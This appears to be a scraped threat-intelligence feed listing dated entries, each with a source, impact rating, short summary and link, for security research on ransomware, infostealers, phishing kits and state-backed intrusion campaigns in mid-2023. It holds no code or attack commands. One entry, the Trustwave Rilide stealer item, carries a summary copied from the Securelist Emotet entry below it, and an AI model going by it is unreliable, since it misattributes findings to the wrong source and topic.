https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/
—
- Intel Source:
- Sentinelone
- Intel Name:
- In_Depth_Analysis_of_LOLKEK_Payloads
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Researchers from SentinelLabs have examined LOLKEK payload sample sets. Small to medium-sized businesses (SMBs) and individual users are typically the main targets.
—
- Intel Source:
- Securelist
- Intel Name:
- Unknown_Actor_Using_DroxiDat_and_Cobalt_Strike
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Securelist researchers have seen a new SystemBC variant deployed to a critical infrastructure target. This time, the proxy-capable backdoor was deployed alongside Cobalt Strike beacons in a South African nation’s critical infrastructure.
Source:
https://securelist.com/focus-on-droxidat-systembc/110302/
—
- Intel Source:
- ASEC
- Intel Name:
- Changes_in_CHM_Malware_Distribution
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- ASEC has previously published on a CHM malware type copying Korean financial institutes and insurance companies. Recently, the execution method of this malware type has been changing every week. The ASEC post covers how the changed execution processes of the CHM malware are recorded in AhnLab’s EDR products.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Attackers_Using_EvilProxy_Phishing_Kit
- Date of Scan:
- 2023-08-10
- Impact:
- HIGH
- Summary:
- Threat actors have been using the phishing toolkit EvilProxy to take control of cloud-based Microsoft 365 accounts belonging to executives at prominent companies. Researchers said the attacks exhibited both the prevalence of pre-packaged phishing-as-a-service toolkits and the increased bypassing of multi-factor authentication to gain access to accounts.
—
- Intel Source:
- AT&T
- Intel Name:
- AdLoad_Turns_Mac_Systems_into_Proxy_Exit_Nodes
- Date of Scan:
- 2023-08-10
- Impact:
- LOW
- Summary:
- Thousands of IPs have been seen by AT&T Alien Labs to act as proxy exit nodes in a way that resembles corrupted AdLoad systems. This activity might be a sign that tens of thousands of Mac computers have been taken over and used as proxy exit nodes. Over the past year, at least 150 samples have been seen in the wild.
Source:
https://cybersecurity.att.com/blogs/labs-research/mac-systems-turned-into-proxy-exit-nodes-by-adload
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_Injection
- Date of Scan:
- 2023-08-10
- Impact:
- LOW
- Summary:
- Magniber ransomware is routinely distributed in high volumes. For the past few years it was distributed through an Internet Explorer vulnerability, but since the browser’s support ended, that vulnerability is no longer being exploited. Recently, the ransomware has started spreading through Chrome and Edge browsers using filenames impersonating Windows security update packages (such as ERROR.Center.Security.msi). Currently, Magniber injects the ransomware into an active process, causing damage by encrypting the user’s files.
—
- Intel Source:
- ASEC
- Intel Name:
- Tax_Invoices_and_Shipping_Statements_Posing_as_GuLoader_Malware
- Date of Scan:
- 2023-08-10
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered instances in which GuLoader was sent as an attachment in emails that were falsely labeled as shipping bills and tax invoices. The newly discovered GuLoader variant was packed in a RAR (Roshal Archive) file. When run by a user, GuLoader eventually downloads well-known malware strains including Remcos, AgentTesla, and Vidar.
—
- Intel Source:
- Cyble
- Intel Name:
- Uncovering_Tech_Scammers_involved_in_different_ransomware_attacks
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- Cyble researchers recently observed a new tech scam campaign. It involved scammers setting up a site for a non-existent antivirus solution to deceive users into paying for non-existent services. During analysis, researchers discovered various ransomware variants leveraged by tech scammers to propagate their fraudulent schemes.
Source:
https://cyble.com/blog/utilization-of-leaked-ransomware-builders-in-tech-related-scams/
—
- Intel Source:
- ASEC
- Intel Name:
- The_malware_installation_as_normal_file_of_a_Korean_Development_Company
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- AhnLab has previously reported on malware that is generated by the installation file of a Korean program development company. When malware is distributed alongside an installation file, users will struggle to notice that malware is being executed concurrently.
—
- Intel Source:
- ASEC
- Intel Name:
- The_Malware_distribution_as_Coin_exchange
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- ASEC has recently discovered new malware disguised with coin exchange and investment-related topics. The malware is disguised as an executable and a Word file. It is suspected that it was created by the Kimsuky group.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Malicious_Python_Package_Campaign_Targets_Developers_through_PyPI
- Date of Scan:
- 2023-08-09
- Impact:
- MEDIUM
- Summary:
- Researchers from ReversingLabs identified a persistent campaign that leverages malicious Python packages on PyPI to deceive developers. Attackers mimic popular open-source tools, embedding hidden malicious code. They create matching GitHub repositories for credibility and employ dynamic command and control URLs.
—
- Intel Source:
- Aquasec
- Intel Name:
- Kubernetes_Exposed
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- Having a Kubernetes (k8s) cluster hijacked could be a disaster magnified a million times over. Aquasec researchers investigated and uncovered Kubernetes clusters belonging to more than 350 organizations, open-source projects, and individuals that were openly accessible and largely unprotected. At least 60% of them were breached and had an active campaign that deployed malware and backdoors.
Source:
https://blog.aquasec.com/kubernetes-exposed-one-yaml-away-from-disaster
—
- Intel Source:
- Zscaler
- Intel Name:
- New_InfoStealer_Named_Statc_Stealer
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz researchers have discovered a new information stealer family called Statc Stealer. It is a sophisticated malware that infects devices powered by Windows, gains access to computer systems, and steals sensitive information.
Source:
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
—
- Intel Source:
- Cyble
- Intel Name:
- The_AgentTesla_malware_attack
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) has recently observed an AgentTesla malware attack that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into opening tax-related documents and accompanying control panel files (CPL).
Source:
https://cyble.com/blog/agenttesla-malware-targets-users-with-malicious-control-panel-file/
—
- Intel Source:
- SOC Radar
- Intel Name:
- Investigating_the_Big_Head_Ransomware
- Date of Scan:
- 2023-08-08
- Impact:
- LOW
- Summary:
- After first appearing in May 2023, Big Head Ransomware is a relatively new actor in the cyber threat environment. This malicious program is made up of several different varieties, each with its own features and powers. Little is known about the threat actor who is responsible for the Big Head Ransomware. The actor has been seen interacting with victims on Telegram and through emails.
Source:
https://socradar.io/dark-web-profile-big-head-ransomware/
—
- Intel Source:
- Team-Cymru
- Intel Name:
- An_Overview_of_Qakbot_Infrastructure
- Date of Scan:
- 2023-08-08
- Impact:
- LOW
- Summary:
- Team-Cymru researchers have provided an update on their high-level analysis of QakBot infrastructure. This represents an ongoing piece of research; their analysis of QakBot is fluid, with various hypotheses being identified and tested. As and when they uncover new insights into QakBot campaigns, they will seek to provide further written updates.
Source:
https://www.team-cymru.com/post/visualizing-qakbot-infrastructure-part-ii-uncharted-territory
—
- Intel Source:
- SentinelOne
- Intel Name:
- North_Korea_icompromised_Russian_Missile_Engineering_Company
- Date of Scan:
- 2023-08-07
- Impact:
- MEDIUM
- Summary:
- SentinelLabs identified an intrusion into the Russian defense industrial base, specifically a missile engineering organization NPO Mashinostroyeniya. Our analysis attributes the email server compromise to the ScarCruft threat actor. We also identify the separate use of a Lazarus Group backdoor for compromise of their internal network.
—
- Intel Source:
- TrendMicro
- Intel Name:
- TargetCompany_Ransomware_Abusing_FUD_Obfuscator_Packers
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- In order to persistently deploy its initial stage, the most recent version of the TargetCompany ransomware first exploits weak SQL servers. The code tries many approaches to achieve persistence, such as switching the URLs or relevant routes, until it successfully locates a location to run the Remcos RAT.
—
- Intel Source:
- Talos
- Intel Name:
- New_Threat_Actor_Leveraging_Customized_Yashma_Ransomware
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- Researchers from Cisco Talos have identified an unknown threat actor, who appears to be of Vietnamese descent, who has been operating ransomware since at least June 4, 2023. This continuing attack makes use of a Yashma ransomware version that mimics WannaCry traits and is expected to target several locations. The ransom note is sent using an unusual method by the threat actor. They execute an embedded batch file to download the ransom note from the actor-controlled GitHub repository rather than inserting the ransom note strings in the malware.
Source:
https://blog.talosintelligence.com/new-threat-actor-using-yashma-ransomware/
—
- Intel Source:
- Trend Micro
- Intel Name:
- Water_minyades_batloader_malware
- Date of Scan:
- 2023-08-07
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers observed that the Water Minyades Batloader malware has evolved with Pyarmor Pro obfuscation, making manual de-obfuscation difficult. Using large MSI files, it initiates a sophisticated kill chain, fingerprinting victim networks and delivering second-stage payloads for stealthy attacks.
Source:
https://www.trendmicro.com/en_us/research/23/h/batloader-campaigns-use-pyarmor-pro-for-evasion.html
—
- Intel Source:
- Fortinet
- Intel Name:
- DoDo_and_Proton_Ransomware_targeting_windows_users
- Date of Scan:
- 2023-08-07
- Impact:
- MEDIUM
- Summary:
- Fortinet’s Ransomware Roundup report highlights the emerging threats of the DoDo and Proton ransomware variants, both specifically designed to target Microsoft Windows users. DoDo ransomware, a derivative of Chaos ransomware, disguises itself as an educational application called “Mercurial Grabber” to steal information and encrypt victims’ files. Its recent variants demand ransom for file decryption and data non-disclosure. Meanwhile, Proton ransomware encrypts files on Windows systems, demanding a ransom for file recovery.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-dodo-and-proton
—
- Intel Source:
- CERT UA
- Intel Name:
- MerlinAgent_cyber_attacks_against_Ukraine
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- Ukraine’s CERT-UA is warning of malicious emails posing as official communications. The emails contain harmful attachments, leading to the execution of dangerous scripts and the deployment of the malicious “ctlhost.exe” associated with the MerlinAgent program.
—
- Intel Source:
- Security Affairs
- Intel Name:
- NPM_highly_targeted_attacks
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- Security Affairs researchers discovered a new set of malicious packages on the npm package manager that can exfiltrate sensitive developer data.
Source:
https://securityaffairs.com/149165/hacking/npm-highly-targeted-attacks.html
—
- Intel Source:
- PT Security
- Intel Name:
- The_Cyber_Campaign_by_Space_Pirates_in_Russia_and_Serbia
- Date of Scan:
- 2023-08-05
- Impact:
- MEDIUM
- Summary:
- Using unique strategies and acquiring new cyber weapons, the threat actor known as Space Pirates has been connected to attacks on at least 16 organizations in Serbia and Russia over the past year. Governmental organizations, educational institutions, private security firms, aerospace makers, agricultural producers, defense, energy, and healthcare companies are among the targets.
—
- Intel Source:
- Any.Run
- Intel Name:
- Remcos_Malware_Analysis
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- The Any.Run malware hunting service recorded a video of Remcos RAT execution and analysis. Remcos is a remote access trojan – malware used to take remote control of infected PCs. This trojan is created and sold to clients by a “business” called Breaking Security. The Remcos trojan can be delivered in different forms. Based on the RAT’s analysis, it can be spread as an executable file with a name that should convince users to open it, or it pretends to be a Microsoft Word file that exploits vulnerabilities.
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Play_ransomware_activity
- Date of Scan:
- 2023-08-04
- Impact:
- MEDIUM
- Summary:
- Trend Micro has observed that the Play ransomware group amplified its activity with a number of new tools and exploits, including the vulnerabilities ProxyNotShell, OWASSRF, and a Microsoft Exchange Server remote code execution vulnerability. More recently, it has also begun to use new tools like Grixba, a custom network scanner and infostealer, and the open-source VSS management tool AlphaVSS.
Source:
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play
—
- Intel Source:
- Any Run
- Intel Name:
- Redline_Malware_Analysis
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- ANY.RUN researchers did the analysis and watched the RedLine malware actions in an interactive sandbox simulation. RedLine Stealer or RedLine is malware that can collect users’ confidential information and deliver other malicious programs.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- From_Small_LNK_to_Large_Malicious_BAT_File_With_Zero_VT_Score
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- An ISC.SANS researcher’s spam trap caught an e-mail with an LNK attachment; the e-mail message was the usual malspam fare, trying to appear as a purchase order sent to the recipient.
Source:
https://isc.sans.edu/diary/From+small+LNK+to+large+malicious+BAT+file+with+zero+VT+score/30094/
—
- Intel Source:
- McAfee
- Intel Name:
- The_Back_to_School_Scams
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- McAfee Labs analysts have discovered PDFs targeting back-to-school trends. Their article advises parents on what to teach their children and how not to fall victim to such fraud. McAfee Labs encountered a PDF file campaign featuring a fake CAPTCHA on its first page to verify human interaction.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-season-of-back-to-school-scams/
—
- Intel Source:
- MetaBase Q
- Intel Name:
- Botnet_Fenix_new_botnet
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- The Threat Intel team at Metabase Q has discovered a local group that created a new botnet called “Fenix,” which specifically targets users accessing government services, particularly tax-paying individuals in Mexico and Chile. The attackers redirect victims to fraudulent websites that mimic the official portals. These fake websites prompt users to download a supposed security tool, claiming it will enhance their portal navigation safety.
—
- Intel Source:
- SOC Radar
- Intel Name:
- The_Attack_Method_of_Rhysida_Ransomware
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- The Rhysida Ransomware Group has become a serious threat in the online environment. In a short period of time, Rhysida posed a significant concern to businesses all across the world with its powerful encryption capabilities and double extortion tactics. The group’s emphasis on attacking military and governmental institutions, as seen in their assault on the Chilean Army, emphasizes how serious their actions may be.
Source:
https://socradar.io/threat-profile-rhysida-ransomware/
—
- Intel Source:
- Trustwave
- Intel Name:
- New_Rilide_Stealer_Version
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- Securelist researchers found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. They described all three in private reports, from which this post contains an excerpt.
—
- Intel Source:
- Securelist
- Intel Name:
- Emotet_DarkGate_and_LokiBot_new_analyses
- Date of Scan:
- 2023-08-04
- Impact:
- MEDIUM
- Summary:
- Securelist researchers found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. They described all three in private reports, from which this post contains an excerpt.
Source:
https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/
—
- Intel Source:
- ASEC
- Intel Name:
- Sliver_C2_malware_being_distributed
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- ASEC has recently observed malware similar to the previously seen SparkRAT being distributed disguised as setup files for Korean VPN service providers and marketing program producers. Unlike the past cases where SparkRAT was used, the recent attacks used Sliver C2 and employed techniques to avoid detection.
—
- Intel Source:
- ASEC
- Intel Name:
- Linux_Systems_Are_Affected_by_Reptile_Malware
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- ASEC has recently observed Reptile, an open-source Linux rootkit with powerful concealment features and port knocking capabilities. The report examines real-world attacks, including those targeting Korean companies, and draws parallels to the Mélofée malware.
—
- Intel Source:
- Microsoft
- Intel Name:
- Hackers_Sent_Phishing_Emails_Masquerading_as_Microsoft_Teams_Chats
- Date of Scan:
- 2023-08-03
- Impact:
- MEDIUM
- Summary:
- In “highly targeted social engineering attacks,” hackers within the Russian military utilized Microsoft Teams discussions as phishing baits. The IT giant announced on Wednesday that it has discovered a campaign by the well-known Russian hacker collective Midnight Blizzard, also known as NOBELIUM, Cozy Bear, or APT29. According to U.S. and U.K. law enforcement organizations, the group is a component of the Russian Federation’s Foreign Intelligence Service.
—
- Intel Source:
- Recorded Future
- Intel Name:
- Russian_APT_BlueCharlie_Swaps_Infrastructure_to_Evade_Detection
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- Researchers from Recorded Future have identified the latest campaign from BlueCharlie, in which the group completely switched its infrastructure, creating nearly 100 new domains from which to perform credential harvesting and follow-on espionage attacks.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0802.pdf
—
- Intel Source:
- SentinelOne
- Intel Name:
- Illicit_Brand_Impersonation
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- SentinelOne researchers continually observe brands being impersonated for illicit use, including credential phishing and malware delivery. In their blog they share examples of opportunistic and targeted threat actors impersonating trusted brands, and describe new tooling that can be used to hunt for and track such actors going forward.
Source:
https://www.sentinelone.com/blog/illicit-brand-impersonation-a-threat-hunting-approach/
—
- Intel Source:
- CISA
- Intel Name:
- Attackers_Exploiting_Ivanti_EPMM_Vulnerabilities
- Date of Scan:
- 2023-08-02
- Impact:
- MEDIUM
- Summary:
- In response to the active exploitation of CVE-2023-35078 and CVE-2023-35081, the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) have released a joint cybersecurity advisory. From at least April 2023 to July 2023, advanced persistent threat actors used CVE-2023-35078 as a zero-day exploit to collect data from a number of Norwegian enterprises as well as to access and compromise the network of a Norwegian government agency.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a
—
- Intel Source:
- Trustwave
- Intel Name:
- New_Variant_of_SkidMap_Targeting_Redis
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Researchers from Trustwave examined the most recent logs from a honeypot in central Europe and discovered an intriguing entry that appeared again less than two weeks later. SkidMap targets only open (“NO AUTH”) Redis instances. They have not observed brute-force attacks coming from the exact IP where the initial attack originated.
—
- Intel Source:
- PaloAlto
- Intel Name:
- NodeStealer_2_0_The_Python_Version
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Unit 42 researchers have recently discovered a previously unreported phishing campaign that distributed an infostealer equipped to fully take over Facebook business accounts. Facebook business accounts were targeted with a phishing lure offering tools such as spreadsheet templates for busines
Source:
https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/
—
- Intel Source:
- Cado Security
- Intel Name:
- New_P2Pinfect_Malware_Campaign_Against_Redis_Servers_Detailed
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Researchers from Cado Security Labs have just discovered a brand-new malware campaign that targets Redis data store deployments that are open to the general public. The malware, which was created in Rust and given the name “P2Pinfect” by the creators, functions as a botnet agent. An embedded Portable Executable (PE) and an additional ELF executable are both included in the sample that researchers analyzed, indicating cross-platform compatibility between Windows and Linux.
—
- Intel Source:
- Halcyon
- Intel Name:
- Ransomware_Command_and_Control_Providers_report
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Halcyon researchers shared research that used new techniques to unmask yet another Ransomware Economy player that is speeding up ransomware attacks and state-sponsored APT operations: Command-and-Control Providers (C2P), who sell services to threat actors while maintaining a legal business profile. In their report, titled Cloudzy with a Chance of Ransomware, Halcyon showed a unique method for identifying C2P entities that can be used to forecast the precursors to major ransomware campaigns and other advanced attacks. Halcyon also identified two new, previously undisclosed ransomware affiliates, which Halcyon named Ghost Clown and Space Kook, that currently deploy BlackBasta and Royal, respectively.
—
- Intel Source:
- Avast
- Intel Name:
- The_Unknown_Risks_of_Dot_Zip_Domains
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- Cybercriminals have begun using .zip domains to trick people into thinking they are downloadable files rather than URLs, according to Avast researchers. According to the research, one-third of the top 30 .zip domains blacklisted by threat detection engines misuse the names of well-known IT firms like Microsoft, Google, Amazon, and Paypal to deceive users into thinking they are files from reputable businesses.
Source:
https://decoded.avast.io/matejkrcma/unpacking-the-threats-within-the-hidden-dangers-of-zip-domains/
—
- Intel Source:
- PaloAlto
- Intel Name:
- URLs_That_Deliver_Ransomware
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- Researchers from Palo Alto have seen that threat actors are increasingly using URLs to deliver ransomware as they look for new ways to get their inventions past victims’ defenses. Additionally, they are utilizing more dynamic behaviors to spread their malware. Threat actors frequently switch hostnames, paths, filenames, or a combination of all three to disperse ransomware, in addition to following the tried-and-true method of deploying polymorphic variants of their ransomware.
Source:
https://unit42.paloaltonetworks.com/url-delivered-ransomware/#post-129339-_cfw3vjr99swz
—
- Intel Source:
- Team-Cymru
- Intel Name:
- The_IcedID_BackConnect_Protocol_Internals
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- Researchers from Team-Cymru have updated their investigation and monitoring of the infrastructure linked to IcedID’s BackConnect protocol.
Source:
https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol-part-2
—
- Intel Source:
- Proofpoint
- Intel Name:
- WikiLoader_Favors_Complex_Evasion
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- WikiLoader is a new piece of malware that Proofpoint researchers have discovered. It was originally observed in December 2022 being delivered by TA544, an attacker who frequently targets Italian enterprises with Ursnif malware. They also noticed numerous subsequent campaigns, the majority of which targeted Italian organizations.
Source:
https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion
—
- Intel Source:
- Cyble
- Intel Name:
- The_Cunning_XWorms_Multi_Staged_Attack
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- The XWorm malware uses a new multistage approach to deliver its payload utilizing LOLBins, according to an analysis by Cyble researchers.
Source:
https://cyble.com/blog/sneaky-xworm-uses-multistaged-attack/
—
- Intel Source:
- Bitdefender
- Intel Name:
- Threat_Actors_Abusing_the_Ad_Network
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- A threat actor with previous roots in cybercrime has shifted its initial access techniques to search engine advertisements to hijack searches for business applications such as AnyDesk, WinSCP, Cisco AnyConnect, Slack, TreeSize and potentially more. Bitdefender research showed that the actor(s) has successfully used this type of attack since late May 2023. Based on their threat insights, the attackers seem to focus exclusively on North America. So far, Bitdefender has identified six target organizations in the US and one in Canada.
—
- Intel Source:
- CISA
- Intel Name:
- v2_SUBMARINE_Backdoor
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- The US Cybersecurity and Infrastructure Security Agency (CISA), part of the Department of Homeland Security, has released a report on a new backdoor malware that could be used by attackers to gain access to a network of secure email addresses. CISA obtained seven malware samples related to a novel backdoor that CISA has named SUBMARINE. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001 – 9.2.0.006 of Barracuda Email Security Gateway (ESG).
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-209a
—
- Intel Source:
- CISA
- Intel Name:
- SEASPY_Backdoor
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- CISA obtained two SEASPY malware samples. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG). SEASPY is a persistent and passive backdoor that masquerades as a legitimate Barracuda service “BarracudaMailService” that allows the threat actors to execute arbitrary commands on the ESG appliance.
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-209b
—
- Intel Source:
- Dr. Web
- Intel Name:
- Fruity_Trojan_Downloaders_Infect_Windows_Systems_in_Multiple_Stages
- Date of Scan:
- 2023-07-31
- Impact:
- LOW
- Summary:
- Dr.Web researchers have observed threat actors creating fake websites that host trojanized software installers to trick unsuspecting users into downloading a downloader malware called Fruity, with the goal of installing remote access trojans such as Remcos RAT.
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- STARK_MULE_Targeting_Koreans_With_US_Military_Themed_Document_Lures
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- Securonix researchers have detected an ongoing cyber assault campaign that is targeting Korean-speaking people by using document lures with American military themes to fool them into launching malware on compromised systems.
—
- Intel Source:
- CISA
- Intel Name:
- CISA_Analyses_Report_v1_Exploit_Payload_Backdoor
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- CISA obtained 14 malware samples comprised of Barracuda exploit payloads and reverse shell backdoors. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG). The payload triggers a command injection (exploiting CVE-2023-2868), leading to dropping and execution of reverse shells on the ESG appliance. The reverse shells establish backdoor communications via OpenSSL with threat actor command and control (C2) servers. The actors delivered this payload to the victim via a phishing email with a malicious .tar attachment.
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-209c
—
- Intel Source:
- Blackberry
- Intel Name:
- Behavioral_detection_tips_for_the_RomCom_campaign
- Date of Scan:
- 2023-07-28
- Impact:
- MEDIUM
- Summary:
- This article provides a technical analysis of the RomCom threat group, which is targeting politicians in Ukraine and U.S.-based healthcare organizations. It outlines process activity, IoCs, and Sigma rules to detect malicious behavior, such as the execution of a file from the Temp folder with a specific command line, and the use of COM objects to establish system persistence.
Source:
https://blogs.blackberry.com/en/2023/07/decoding-romcom-behaviors-and-opportunities-for-detection
—
- Intel Source:
- Sophos
- Intel Name:
- The_discover_of_apps_targeting_Iranian_bank_customers
- Date of Scan:
- 2023-07-28
- Impact:
- LOW
- Summary:
- Sophos X-Ops researchers discovered malicious apps targeting Iranian banks, which collect internet banking login credentials and credit card details, and have capabilities such as hiding icons and intercepting SMS messages. The threat actors used Firebase as a C2 mechanism and leveraged legitimate domains for C2 servers. The malware also searches for other banking, payment, and cryptocurrency apps, and the certificate used to sign the malicious apps was previously used by an IT consulting and development firm in Malaysia. The malicious apps request permissions to read SMS messages and urge users to grant them.
Source:
https://news.sophos.com/en-us/2023/07/27/uncovering-an-iranian-mobile-malware-campaign/
—
- Intel Source:
- Sophos
- Intel Name:
- A_New_Malicious_Campaign_Distributing_IT_Tools
- Date of Scan:
- 2023-07-28
- Impact:
- LOW
- Summary:
- Researchers from Sophos have discovered a new malvertising campaign that targets users looking for IT tools like AnyDesk, Cisco AnyConnect VPN, and WinSCP by using ads on Google Search and Bing. This campaign attempts to trick users into downloading trojanized installers in order to access corporate networks and possibly launch future ransomware attacks.
Source:
https://news.sophos.com/en-us/2023/07/26/into-the-tank-with-nitrogen/
—
- Intel Source:
- Recorded Future
- Intel Name:
- BlueBravo_Attacks_European_Diplomatic_Entities
- Date of Scan:
- 2023-07-28
- Impact:
- MEDIUM
- Summary:
- In order to deliver a new backdoor named GraphicalProton, the Russian nation-state actor known as BlueBravo has been detected targeting diplomatic institutions around Eastern Europe. This illustrates the threat’s ongoing evolution. The use of lawful internet services (LIS) for command-and-control (C2) obfuscation is a defining feature of the phishing campaign.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf
—
- Intel Source:
- Zscaler
- Intel Name:
- In_depth_Campaign_Analysis_of_QakBot
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have conducted in-depth investigations to uncover the various attack chains employed by Qakbot. In this research, they delve into the depths of Qakbot, conducting a comprehensive technical analysis to understand its behavior, attack vectors, and distribution methods.
—
- Intel Source:
- Trellix
- Intel Name:
- Exploiting_of_the_search_ms_URI_Protocol_Handler
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- This article discusses the use of malicious payloads, such as AsyncRAT and Remcos RAT, by attackers to gain remote control over an infected system. It also covers the use of the “search” / “search-ms” URI protocol handler to launch attacks using a variety of file types, and how to disable this protocol handler. Additionally, it provides configuration information for AsyncRAT, including two IP addresses, six ports, a default botnet, a version number, and various settings.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
—
- Intel Source:
- Aquasec
- Intel Name:
- Tomcat_attacked_by_Mirai_Malware_and_beyond
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- This article discusses the misconfiguration of Apache Tomcat, the impact of the malware ‘l4sd4sx64’, and the prevalence of Apache Tomcat in cloud, big data, and website development. It also provides an analysis of the attacks against Tomcat server honeypots over a two-year period, including the detection of a web shell hidden in a WAR file, the execution of a shell script, and the execution of the Mirai malware.
Source:
https://blog.aquasec.com/tomcat-under-attack-investigating-the-mirai-malware
—
- Intel Source:
- Mandiant
- Intel Name:
- The_Deep_Investigation_of_JumpCloud_System_Breach
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have investigated the JumpCloud system breach and its impact on customers. Mandiant attributed these intrusions to UNC4899, a Democratic People’s Republic of Korea (DPRK)-nexus actor, with a history of targeting companies within the cryptocurrency vertical.
Source:
https://www.mandiant.com/resources/blog/north-korea-supply-chain
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Threat_Group_Attacking_Windows_Servers
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered that Lazarus, a threat group deemed to be nationally funded, is attacking Windows Internet Information Service (IIS) web servers and using them as distribution points for their malware.
—
- Intel Source:
- Splunk
- Intel Name:
- The_Analysis_of_Amadey_Threat
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- The Amadey Trojan Stealer, an active and prominent malware, first emerged on the cybersecurity landscape in 2018 and has maintained a persistent botnet infrastructure ever since. Several campaigns have used this malware.
Source:
https://www.splunk.com/en_us/blog/security/amadey-threat-analysis-and-detections.html
—
- Intel Source:
- Sygnia
- Intel Name:
- Casbaneiro_Infection_Chain_is_Back
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Sygnia researchers have observed that threat actors behind the Casbaneiro campaign are still active to this day, with some changes over the years in their attack chain, C2 infrastructure, and TTPs. The threat actors are still making effective use of spear-phishing attack to initiate their infection chain, and still appear to be focused on Latin American targets.
Source:
https://blog.sygnia.co/breaking-down-casbaneiro-infection-chain-part2
—
- Intel Source:
- GitHub Blog
- Intel Name:
- Jade_Sleet_Storm_0954_Social_Engineering_Campaign
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
